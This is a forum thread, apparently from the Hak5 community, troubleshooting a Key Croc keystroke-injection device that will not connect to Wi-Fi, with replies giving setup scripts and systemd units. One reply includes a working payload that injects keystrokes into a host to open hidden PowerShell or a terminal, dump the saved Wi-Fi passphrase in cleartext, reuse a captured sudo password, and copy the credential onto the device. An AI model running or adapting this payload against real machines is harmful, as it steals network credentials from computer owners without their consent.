
Key croc refuses to connect to Wi-Fi


alex7272


Hi guys,

I’m having issues connecting the croc to Wi-Fi. I’ve had many other devices successfully configured before, so I know what I am doing; however, I can’t for the life of me connect the croc to Wi-Fi. The things I have tried:

1. Read the hak5 documentation (600999 times)

2. Read forums about people with the same issue (none on here seemed to resolve it successfully)

3. Upgraded to the latest 1.3 firmware

4. Factory reset

5. Created multiple easier, all-lowercase networks and passwords to avoid special characters that require escaping

6. Ran ps ax and killed the dhclient wlan0 and the other wlan command (as suggested in another hak5 post) and brought them back up, to no avail

7. I have checked the wpa supplicant conf file and it is showing the correct information

8. I have saved the config file with Notepad++ with line endings set to Unix, and also saved it with nano in the root directory to make sure there are no funny line endings

9. Tried it on someone else’s completely different network

10. I’ve tested different payloads and they are being executed as expected (except the payloads that grab IP info; they show blank lines)

11. Downgraded to the 1.2 firmware - didn’t fix it either

I’ve spent about 2 days trying to get this working on what is literally a brand new device out of the box. I’ve watched the hak5 demo videos; it seems like a very easy device to configure, but that is highly misleading, which is a bit of a letdown. I rarely ever post on forums like this; I'm only posting because I am completely out of options, and no documentation or forums I found have helped. It seems this issue is quite common but there are no fixes.

Any assistance would be greatly appreciated!! Thank you!!


  • 2 weeks later...

Try these payloads and see if they help you to connect to a wifi access point.

For this payload, just edit in your SSID name and password, add the payload to the keycroc payload folder, reboot the keycroc, and then type the match word (mywifi). The LED will turn green and the keycroc should be connected to the wifi access point.

You may want to delete the config file off your keycroc first, just in case it's corrupted in some way. Don't worry, the keycroc will generate a new config file on next boot.

 

# Title:         WIFI-SETUP
# Description:   Connect to access point quickly by match word add ssid and passwd
# Author:        spywill
# Version:       1.4
# Category:      Key Croc

MATCH mywifi

SSID_NAME=ADD_SSID_NAME_HERE
SSID_PASSWD=ADD_PASSWORD_HERE

LED SETUP
# Double quotes so $SSID_NAME and $SSID_PASSWD expand before sed appends them after line 9
sed -i -E -e '/^[WS]/d' -e "9 a WIFI_SSID $SSID_NAME\nWIFI_PASS $SSID_PASSWD\nSSH ENABLE" /root/udisk/config.txt
sleep 1

PID_WPA=$(pidof wpa_supplicant)
PID_DHC=$(pidof dhclient)
ifconfig wlan0 down
echo -ne "network={\n\tssid=\"$SSID_NAME\"\n\tpsk=\"$SSID_PASSWD\"\n\tpriority=1\n}" > /etc/wpa_supplicant.conf
kill -9 $PID_WPA && kill -9 $PID_DHC
sleep 2
ifconfig wlan0 up
sleep 2
wpa_supplicant -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf -B && dhclient wlan0
sleep 5
systemctl restart ssh.service
sleep 1

if : >/dev/tcp/8.8.8.8/53; then
	LED FINISH
else
	LED R
fi
sleep 3
LED OFF

 

For this payload, just add it to the keycroc payload folder, reboot the keycroc, and then type the match word:

getonline_W <-- MATCH word for windows
getonline_L <-- MATCH word for Linux
getonline_R <-- MATCH word for Raspberry pi

Then the LED will turn green and the keycroc should be connected to the wifi access point.

 

# Title:           Croc_Getonline
# Description:     Attempt to connect Keycroc automatically to target wifi access point
#                  Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
# Author:          spywill
# Version:         3.5
# Category:        Key Croc
# Props:           Cribbit, Lodrix, potong, RootJunky, dark_pyrro

MATCH (getonline_W|getonline_R|getonline_L)

CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done

wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt

if [ -f $wifi_pass ]; then
	cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
	rm -f $wifi_pass
fi

ATTACKMODE HID STORAGE
Q DELAY 5000
LED ATTACK

case $LOOT in
	getonline_W)
		Q GUI r
		Q DELAY 3000
		Q STRING "powershell -NoP -NonI -W Hidden"
		Q ENTER
		Q DELAY 5000
		Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
		Q ENTER
		Q DELAY 3000
		Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
		Q ENTER
		Q DELAY 2000
		Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
		Q ENTER
		Q DELAY 2000
		Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
		Q ENTER
		Q DELAY 5000
		Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
		Q ENTER
;;
	getonline_R)
		Q CONTROL-ALT-d
		Q CONTROL-ALT-t
		Q DELAY 2000
		Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
		Q ENTER
		Q DELAY 2000
		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
		Q ENTER
		Q DELAY 2000
		Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
		Q ENTER
		Q DELAY 2000
		Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
		Q ENTER
		Q DELAY 3000
		Q STRING "umount \$MOUNT_POINT ; exit"
		Q ENTER
;;
	getonline_L)
		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
			PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
		else
			PC_PW=LINUX
		fi
		Q CONTROL-ALT-d
		Q ALT-t
		Q DELAY 2000
		Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
		Q ENTER
		Q DELAY 2000
		Q STRING "$PC_PW"
		Q ENTER
		Q DELAY 2000
		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
		Q ENTER
		Q DELAY 2000
		Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
		Q ENTER
		Q DELAY 2000
		Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
		Q ENTER
		Q DELAY 3000
		Q STRING "sudo umount \$MOUNT_POINT ; exit"
		Q ENTER
;;
esac

ATTACKMODE HID
sleep 3

LED SETUP
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
ifconfig wlan0 down

if [ "$LOOT" = "getonline_W" ]; then
	sed -i '0,/./s/^.//' $wifi_pass
	sed -i 's/\r//g' $wifi_pass
fi

sed -i 's/\( \)*/\1/g' $wifi_pass
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
ifconfig wlan0 up
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
sleep 3
systemctl restart ssh.service

[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
sleep 3
LED OFF

 

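A pre-reboot check for the config.txt problems raised in this thread (Windows line endings, a byte order mark left by Windows tools, passphrase length), as an added example that is not part of any post above or of Hak5's own tooling. It assumes the `WIFI_SSID <name>` / `WIFI_PASS <passphrase>` line format that the WIFI-SETUP payload writes; `lint_croc_config` is a hypothetical helper name.

```sh
# Added example: lint a Key Croc style config.txt before rebooting the device.
# Assumed line format (taken from the payload above): "WIFI_SSID <name>",
# "WIFI_PASS <passphrase>". Prints one finding per line; returns 0 when clean.
lint_croc_config() {
	local cfg ssid pass cr found
	cfg=$1; found=0; cr=$(printf '\r')
	[ -r "$cfg" ] || { echo "cannot read $cfg"; return 1; }

	# A UTF-8 BOM (EF BB BF) is what Windows editors and Out-File prepend.
	if [ "$(head -c 3 "$cfg" | od -An -tx1 | tr -d ' \n')" = "efbbbf" ]; then
		echo "BOM: file starts with a UTF-8 byte order mark"; found=1
	fi
	# CRLF endings leave an invisible \r glued to the SSID or passphrase.
	if grep -q "$cr" "$cfg"; then
		echo "CRLF: carriage returns present, convert to Unix line endings"; found=1
	fi

	# Take the first occurrence of each key, minus any stray \r.
	ssid=$(sed -n 's/^WIFI_SSID \(.*\)$/\1/p' "$cfg" | tr -d '\r' | head -n 1)
	pass=$(sed -n 's/^WIFI_PASS \(.*\)$/\1/p' "$cfg" | tr -d '\r' | head -n 1)

	if [ -z "$ssid" ]; then
		echo "SSID: no 'WIFI_SSID <name>' line found"; found=1
	elif [ "${#ssid}" -gt 32 ]; then
		echo "SSID: longer than 32 characters"; found=1
	fi
	# WPA/WPA2 passphrases are 8 to 63 characters; wpa_passphrase rejects others.
	if [ -z "$pass" ]; then
		echo "PASS: no 'WIFI_PASS <passphrase>' line found"; found=1
	elif [ "${#pass}" -lt 8 ] || [ "${#pass}" -gt 63 ]; then
		echo "PASS: length ${#pass} is outside 8..63"; found=1
	fi
	return "$found"
}

# Usage: lint_croc_config /root/udisk/config.txt
```

An empty result with exit status 0 means the file's Wi-Fi lines are well-formed, which points the troubleshooting at the radio, driver or access point rather than at the config.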

  • 5 months later...

Sometimes I find myself having a hard time running payloads because of the Numlock state on my keyboard. For some reason, after a reboot of my PC, my keyboard's Numlock state will be off and my payloads will fail to execute; in this state it will not quack any numbers. I press the Numlock key to turn it on, then run the payload, and the payload executes. I'm not sure if this will fix the issue.


  • 6 months later...

This one worked for me. I tried most of the things to connect the croc to wifi, but to no avail. Connect to the serial console, then create a file:

wpa_passphrase 'SSID_NAME' 'SSID_PASSPHRASE' > /etc/wpa_supplicant/wpa_supplicant.conf

And connect to the wifi using this:

wpa_supplicant -B -c /etc/wpa_supplicant/wpa_supplicant.conf -i wlan0

To get an IP address, I requested one from the DHCP server:

dhclient wlan0

 

Note that you might want to create a persistent service, if you want the croc to reconnect even after reboot.

/etc/systemd/system/wpa_supplicant.service

```

[Unit]
Description=WPA supplicant

[Service]
Type=dbus
BusName=fi.epitest.hostap.WPASupplicant
ExecStart=/sbin/wpa_supplicant -u -s -c /etc/wpa_supplicant/wpa_supplicant.conf -i wlan0
Restart=always

[Install]
WantedBy=default.target

```

and a DHCP service.

```

[Unit]
Description= DHCP Client
Before=network.target

[Service]
Type=forking
ExecStart=/sbin/dhclient wlan0 -v
ExecStop=/sbin/dhclient wlan0 -r
Restart=always

[Install]
WantedBy=default.target

```

Enable services:

systemctl enable wpa_supplicant.service dhcp.service

systemctl start wpa_supplicant.service dhcp.service

 

Hope this helps, since this resolves my issue.
